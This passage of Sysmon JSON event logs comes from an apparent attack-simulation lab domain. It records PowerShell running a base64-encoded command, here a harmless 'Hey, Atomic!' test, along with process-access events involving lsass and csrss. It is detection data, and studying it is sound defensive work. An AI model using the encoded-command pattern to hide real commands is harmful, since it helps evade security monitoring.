{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5239,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.578\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010C40A0A00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.578","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010C40A0A00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5240,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.578\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 4072\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010C40A0A00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.578","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"4072","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010C40A0A00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5241,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.659\r\nProcessGuid: {A837DB8D-032C-5F25-0000-0010BD160A00}\r\nProcessId: 4420\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgACIASABlAHkALAAgAEEAdABvAG0AaQBjACEAIgA=\r\nCurrentDirectory: C:\\Users\\Administrator\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {A837DB8D-032C-5F25-0000-0010C40A0A00}\r\nParentProcessId: 4996\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" & {$OriginalCommand = 'Write-Host \\\"\"Hey, Atomic!\\\"\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand} ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.659","ProcessGuid":"{A837DB8D-032C-5F25-0000-0010BD160A00}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgACIASABlAHkALAAgAEEAdABvAG0AaQBjACEAIgA=","CurrentDirectory":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453","ParentProcessGuid":"{A837DB8D-032C-5F25-0000-0010C40A0A00}","ParentProcessId":"4996","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" &amp; {$OriginalCommand = 'Write-Host \\\"\"Hey, Atomic!\\\"\"'\n$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)\n$EncodedCommand =[Convert]::ToBase64String($Bytes)\n$EncodedCommand\npowershell.exe -EncodedCommand $EncodedCommand} ","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5242,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.656\r\nSourceProcessGUID: {A837DB8D-032C-5F25-0000-0010C40A0A00}\r\nSourceProcessId: 4996\r\nSourceThreadId: 892\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010BD160A00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342a5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.656","SourceProcessGUID":"{A837DB8D-032C-5F25-0000-0010C40A0A00}","SourceProcessId":"4996","SourceThreadId":"892","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010BD160A00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342a5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5243,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.656\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-032C-5F25-0000-0010BD160A00}\r\nTargetProcessId: 4420\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.656","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-032C-5F25-0000-0010BD160A00}","TargetProcessId":"4420","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5244,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.656","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5245,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.656\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 